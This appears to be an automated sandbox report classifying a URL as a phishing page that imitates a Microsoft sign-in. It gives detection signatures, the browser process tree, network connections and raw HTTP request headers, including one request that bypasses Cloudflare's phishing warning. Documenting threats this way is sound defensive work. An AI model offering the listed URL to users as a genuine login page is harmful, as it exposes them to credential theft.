Edit tour

Windows Analysis Report
https://incomestatementdocument.classical.it.com/NC6tS/

Overview

General Information

Sample URL:https://incomestatementdocument.classical.it.com/NC6tS/
Analysis ID:1644631
Infos:

Detection

HTMLPhisher
Score:68
Range:0 - 100
Confidence:100%

Signatures

AI detected phishing page
Yara detected BlockedWebSite
Yara detected HtmlPhish10
AI detected landing page (webpage, office document or email)
Creates files inside the system directory
Deletes files inside the Windows folder
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL
Invalid T&C link found

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64_ra
  • chrome.exe (PID: 6244 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 6436 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2068,i,3826316609623489893,17020259341464328853,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2260 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 7140 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://incomestatementdocument.classical.it.com/NC6tS/" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
0.0.pages.csvJoeSecurity_BlockedWebSiteYara detected BlockedWebSiteJoe Security
    0.6.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      No Sigma rule has matched
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      Phishing

      barindex
      Source: https://incomestatementdocument.classical.it.com/NC6tS/Joe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'., The URL 'incomestatementdocument.classical.it.com' does not match the legitimate domain 'microsoft.com'., The URL contains multiple subdomains and an unusual structure, which is often indicative of phishing., The domain 'it.com' is not typically associated with Microsoft, raising suspicion., The presence of generic terms like 'incomestatementdocument' and 'classical' in the URL is unusual for a Microsoft-related site. DOM: 0.2.pages.csv
      Source: https://incomestatementdocument.classical.it.com/NC6tS/Joe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'., The URL 'incomestatementdocument.classical.it.com' does not match the legitimate domain 'microsoft.com'., The URL contains multiple subdomains and an unusual structure, which is a common tactic in phishing attempts., The domain 'it.com' is not typically associated with Microsoft, raising suspicion., The presence of input fields for 'Email, phone, or Skype' is consistent with phishing attempts targeting Microsoft accounts. DOM: 0.6.pages.csv
      Source: Yara matchFile source: 0.0.pages.csv, type: HTML
      Source: Yara matchFile source: 0.6.pages.csv, type: HTML
      Source: https://incomestatementdocument.classical.it.com/NC6tS/Joe Sandbox AI: Page contains button: 'Verify you are human' Source: '0.4.pages.csv'
      Source: https://incomestatementdocument.classical.it.com/NC6tS/HTTP Parser: Number of links: 0
      Source: https://incomestatementdocument.classical.it.com/NC6tS/HTTP Parser: <input type="password" .../> found but no <form action="...
      Source: https://incomestatementdocument.classical.it.com/NC6tS/HTTP Parser: Title: Sign in to your account does not match URL
      Source: https://incomestatementdocument.classical.it.com/NC6tS/HTTP Parser: Invalid link: Privacy statement
      Source: https://incomestatementdocument.classical.it.com/NC6tS/HTTP Parser: <input type="password" .../> found
      Source: https://incomestatementdocument.classical.it.com/NC6tS/HTTP Parser: No favicon
      Source: https://incomestatementdocument.classical.it.com/NC6tS/HTTP Parser: No favicon
      Source: https://incomestatementdocument.classical.it.com/NC6tS/HTTP Parser: No favicon
      Source: https://incomestatementdocument.classical.it.com/NC6tS/HTTP Parser: No favicon
      Source: https://incomestatementdocument.classical.it.com/NC6tS/HTTP Parser: No favicon
      Source: https://incomestatementdocument.classical.it.com/NC6tS/HTTP Parser: No <meta name="author".. found
      Source: https://incomestatementdocument.classical.it.com/NC6tS/HTTP Parser: No <meta name="copyright".. found
      Source: unknownHTTPS traffic detected: 172.67.216.207:443 -> 192.168.2.16:49704 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.216.207:443 -> 192.168.2.16:49703 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49707 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49708 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.216.207:443 -> 192.168.2.16:49717 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.80.100:443 -> 192.168.2.16:49718 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.16:49722 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.187.19:443 -> 192.168.2.16:49723 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.92.58:443 -> 192.168.2.16:49725 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.16:49726 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.16:49731 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.16:49762 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 151.101.2.137:443 -> 192.168.2.16:49763 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.11.207:443 -> 192.168.2.16:49765 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.11.207:443 -> 192.168.2.16:49764 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 43.128.240.48:443 -> 192.168.2.16:49767 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.24.46:443 -> 192.168.2.16:49769 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.56.162.51:443 -> 192.168.2.16:49768 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.56.162.51:443 -> 192.168.2.16:49770 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.216.207:443 -> 192.168.2.16:49771 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.209.72.31:443 -> 192.168.2.16:49774 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.209.72.9:443 -> 192.168.2.16:49778 version: TLS 1.2
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
      Source: unknownTCP traffic detected without corresponding DNS query: 142.251.41.3
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
      Source: unknownTCP traffic detected without corresponding DNS query: 142.251.41.3
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /NC6tS/ HTTP/1.1Host: incomestatementdocument.classical.it.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/styles/cf.errors.css HTTP/1.1Host: incomestatementdocument.classical.it.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://incomestatementdocument.classical.it.com/NC6tS/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/images/icon-exclamation.png?1376755637 HTTP/1.1Host: incomestatementdocument.classical.it.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://incomestatementdocument.classical.it.com/cdn-cgi/styles/cf.errors.cssAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: incomestatementdocument.classical.it.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://incomestatementdocument.classical.it.com/NC6tS/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/images/icon-exclamation.png?1376755637 HTTP/1.1Host: incomestatementdocument.classical.it.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/phish-bypass?atok=qbZKTob1vc49eZEQNjBdlDAI03z6mL1m7vTSqeBdGpo-1742492784-0.0.1.1-%2FNC6tS%2F HTTP/1.1Host: incomestatementdocument.classical.it.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://incomestatementdocument.classical.it.com/NC6tS/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /NC6tS/ HTTP/1.1Host: incomestatementdocument.classical.it.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://incomestatementdocument.classical.it.com/NC6tS/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_mw_byp=qbZKTob1vc49eZEQNjBdlDAI03z6mL1m7vTSqeBdGpo-1742492784-0.0.1.1-/NC6tS/
      Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://incomestatementdocument.classical.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /logos/assets/PNG/Microsoft_Logo_512px.png HTTP/1.1Host: mailmeteor.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://incomestatementdocument.classical.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/708f7a809116/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://incomestatementdocument.classical.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /logos/assets/PNG/Microsoft_Logo_512px.png HTTP/1.1Host: mailmeteor.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/6kzry/0x4AAAAAABBUE4SschSoV_Hq/auto/fbE/new/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeReferer: https://incomestatementdocument.classical.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=923707b7eceb8ce8&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/6kzry/0x4AAAAAABBUE4SschSoV_Hq/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/6kzry/0x4AAAAAABBUE4SschSoV_Hq/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/310346162:1742491115:9Ic98fm1bm6UZNqolicYeekvkrwSVIH1ayYCexa4QzM/923707b7eceb8ce8/2CNAH9JqFOOP8uA0lIBT02cSnv2QlQTl.ABIWgr0E1A-1742492798-1.1.1.1-aR2nHo7nsO9RghcdPok9EtURfSVO2zwh0rs3oVvye6ThxHDBNOawXnDFAvvWnA2Z HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/d/923707b7eceb8ce8/1742492800972/GKCgZTjmCvgxbop HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/6kzry/0x4AAAAAABBUE4SschSoV_Hq/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/d/923707b7eceb8ce8/1742492800972/GKCgZTjmCvgxbop HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/923707b7eceb8ce8/1742492800976/bde426b7923722d2c6f2630eebdab868e4e355ae0b52186206f78e4da8c7c454/OrJeW4tuWUw2AZ2 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/6kzry/0x4AAAAAABBUE4SschSoV_Hq/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/310346162:1742491115:9Ic98fm1bm6UZNqolicYeekvkrwSVIH1ayYCexa4QzM/923707b7eceb8ce8/2CNAH9JqFOOP8uA0lIBT02cSnv2QlQTl.ABIWgr0E1A-1742492798-1.1.1.1-aR2nHo7nsO9RghcdPok9EtURfSVO2zwh0rs3oVvye6ThxHDBNOawXnDFAvvWnA2Z HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/310346162:1742491115:9Ic98fm1bm6UZNqolicYeekvkrwSVIH1ayYCexa4QzM/923707b7eceb8ce8/2CNAH9JqFOOP8uA0lIBT02cSnv2QlQTl.ABIWgr0E1A-1742492798-1.1.1.1-aR2nHo7nsO9RghcdPok9EtURfSVO2zwh0rs3oVvye6ThxHDBNOawXnDFAvvWnA2Z HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveOrigin: https://incomestatementdocument.classical.it.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://incomestatementdocument.classical.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /jquery-3.2.1.slim.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveOrigin: https://incomestatementdocument.classical.it.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://incomestatementdocument.classical.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-aliveOrigin: https://incomestatementdocument.classical.it.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://incomestatementdocument.classical.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
